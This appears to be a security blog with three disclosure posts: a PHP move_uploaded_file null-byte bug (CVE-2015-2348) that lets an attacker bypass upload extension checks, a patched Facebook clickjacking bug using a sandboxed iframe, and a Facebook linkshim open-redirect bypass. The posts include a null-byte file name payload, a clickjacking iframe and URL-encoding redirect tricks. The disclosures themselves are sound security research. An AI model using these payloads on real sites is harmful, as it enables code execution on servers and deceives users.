findings

Exploiting PHP Upload forms with CVE-2015-2348

4:06 AM

Today I would like to post about a recent bug I have found in PHP, CVE-2015-2348.
This bug is fairly severe. (considering the amount of developers & packages affected).
I have to admit checking the file extension and saying a file is safe can still cause many
other security issues. However, checking for this exact vulnerability in your code is pretty
unrealistic, considering it can pass the Content-Type, Extension, Mime type, size checks...
etc won't save you from this.

The issue occurs in the very popular move_uploaded_files php function that is used to handle
user uploaded files. This function checks to ensure that the file designated by
filename is a valid upload file (meaning that it was uploaded via PHP's HTTP POST upload
mechanism). If the file is valid, it will be moved to the filename given by destination.

Example:

move_uploaded_file ( string $filename , string $destination )

The problem with it is that there is a way to insert null-bytes (fixed multiple times before,
i.e: CVE-2006-7243). Using null-bytes an attacker can convince an upload box to ignore
extension checks and that the file is fairly safe and valid and upload malicious files that
can cause RCE. using the character \x00

I am going to take DVWA for an example here. DVWA's highest level is meant to be unbroken
for number of issues. the high upload box is meant to teach developers the safe way of handling
a safe upload. Lets just exploit that.

Here is the code snippet from https://github.com/RandomStorm/DVWA/blob/master/
vulnerabilities/upload/source/high.php:

$uploaded_name = $_FILES['uploaded']['name'];
$uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
$uploaded_size = $_FILES['uploaded']['size'];

if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" ||
$uploaded_ext == "JPEG") && ($uploaded_size < 100000)){

if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {

$html .= '';
$html .= 'Your image was not uploaded.';
$html .= ''; }
else {
$html .= $target_path . ' succesfully uploaded!';
.
.

This is yes vulnerable to number of exploits (like XSCH, XSS and more), but not RCE.
Because since PHP 5.3.1 Null bytes are deprecated. The problem with DVWA is that its passing user provided name to the move_uploaded_file() - Expected behavior for PHP to create:

move_uploaded_file($_FILES['name']['tmp_name'],"/file.php\x00.jpg")

That file should have created the file "file.php\x00.jpg"

Reality is it creates: file.php

This clearly bypasses the extension check. It has been proven many times the GD libraries
can also be defeated ( getimagesize(), imagecreatefromjpeg()... ),
read this by @secgeek for example.

Now even if you have had done multiple checks for this, it will be highly unlikely you blacklisted
the char \x00 so most upload forms running PHP before 5.4.39, 5.5.x before 5.5.23, and 5.6.x
before 5.6.7 are vulnerable for this particular attack.

Closing:

If you are on a vulnerable server, update!

bugbounty

Facebook Bug Bounty: Clickjacking

10:14 AM



Note: this is actually a guest post from a friend, Sahad Nk with his recently patched Facebook Clickjacking bug. 

According to OWASP: 

We frame a certain website A within an Iframe and using stylesheets, we made it invisible/hidden (when it exists in the background) and reconstruct another site before it. So while you click something on the attacker controlled site, I can actually make you click a button in the framed website.

The Exploit:

The exploit is really simple and effective; Facebook defends click-jacking in 2 ways. One is an alternative to the other. They also use a technique called Frame-busting (using javascript to deny framing request). On interfaces which don't have a JS support it is sending XFO, not as a
HTTP header, but in a meta tag by putting it in a <noscript> tag

<noscript><meta http-equiv="X-Frame-­Options" content="deny"> </noscript>

Meta-tags that attempt to apply the X-Frame-Options directive DO NOT WORK in all browsers. For example, <meta http-equiv="X-Frame-­Options" content="deny">) will not work. You must apply the X-FRAME-OPTIONS directive as an actual HTTP Response Header. The main point here is browsers ignore what is given in meta tag and do not defend framing, (tested in Firefox 35) but Facebook has an additional JS based frame busting.

On interfaces which require JS support, it is possible to bypass JS frame-busting by putting a sandbox in the iframe like:

<iframe id="clickjacking" src="https://­iphone.facebook.com/­dialog/feed?app_id[APP ID]&picture­=http://example.com/­example.JPG&name=Test­&description=This%20­is%20a%20test&redire­ct_uri=http://­example.com/" width="500" height="500" scrolling="no" frameborder="none" sandbox="allow-forms­"> </iframe>


Simple as that, it was possible to iframe Facebook and make you do many undesirable amount of things. Here is a video demonstrating the seriousness of how this exploit might have been abused:



Reported - March 20

Clarification - March 21
Fix & Bounty  - March 24

thanks,
Sahad Nk


bugbounty

Facebook: Another Linkshim Bypass

12:48 PM


I wasn't going to post about it then I thought it could be an interesting article to post because this is the 3rd vulnerability that got fixed in the same parameter 6 months later.

You can find my initial linkshim bypass to this exact position which later turns out to be XSS if you click here. In the first bug I found in the continue parameter, it is possible to bypass linkshim and force a redirection to a site before being checked but then, XSS. 

First I am going to talk about the relevant and great technique I learned from the prompt.ml XSS Challenge(s) 4, you can find the DOM XSS challenge here. consider the code:

function escape(input) {
    // make sure the script belongs to own site
    // sample script: http://prompt.ml/js/test.js
    if (/^(?:https?:)?\/\/prompt\.ml\//i.test(decodeURIComponent(input))) {
        var script = document.createElement('script');
        script.src = input;
        return script.outerHTML;
    } else {
        return 'Invalid resource.';
    }
}

This is the JS source code of challenge 4. they basically want you to bypass a regex to get an external redirection. And the main problem here is that it uses decodeURIComponent(), a function that decodes supplied input from URL encoding. In this case, we can trick the browser believe the prompt.ml domain (allowed by the regex) belongs to our URL. This should be very simple using HTTP auth, like http://prompt.ml@attacker.com the above URL redirects to attacker.com and should bypass the regex because having the prompt.ml.

To bypass decodeURIComponent(), we simply have to use %2f which is a URL encoded representation for the /. And our bypass is: 
//prompt.ml%2f@á„’.ws/

The trick to solve the level with 17 characters only lies hidden in a transformation behavior some browsers apply when converting Unicode characters to URLs. A certain range of characters resolves to three other characters of which one is a dot - the dot we need for the URL. The following vectors uses the domain 14.rs that can be expressed by two characters only.”

A url that starts with two forward slashes is treated as absolute by browsers. Something similar seems to cause this issue (server-side), when given the continue parameter,

This successfully will send example.com for a check to a linkshim before external redirection which means https://m.facebook.com/feed_menu/?story_fbid=808015282566492&id=100000740832129&confirm=h&continue=http://evilzone.org should be malicious.

Now a stupid enough URL validator will consider //evilzone.org a relative location and won’t allow us create a hyperlink like <a href=”//evilzone.org”> and FB did blacklisted //. The next try should be \/evilzone.org, since most browsers render \ back to / this usually bypass the check and create //evilzone.org

But both // and \/ got caught. At this point I concluded the linkshim uses number of blacklist based checks from \\, //, \/ and attempted fuzzing.

I then was talking to @FransRosen and he mentioned about a technique that could still cause another bypass. \%09/@site.com

This basically should be equivalent to //@site.com and since their regex didn't contain \%09/ , \%0D/ or \%0A/ in its banlist, this results in // being back because the %09 will obviously get ignored while parsing.  We can keep adding as many of these in between. And the complete linkshim bypass will look something like:




Feb 1, 2015 6:33am - Initial Report
Feb 1, 2015 6:47am - More Clarification sent
Feb 2, 2015 6:11am - More Classfication asked 
Feb 3, 2015 1:04pm - Some more clarifications sent
Feb 4, 2015 11:25am - Escalation of bug    
Feb 23, 2015 11:00am - Bug Fixed
  
Thanks you for reading! :-)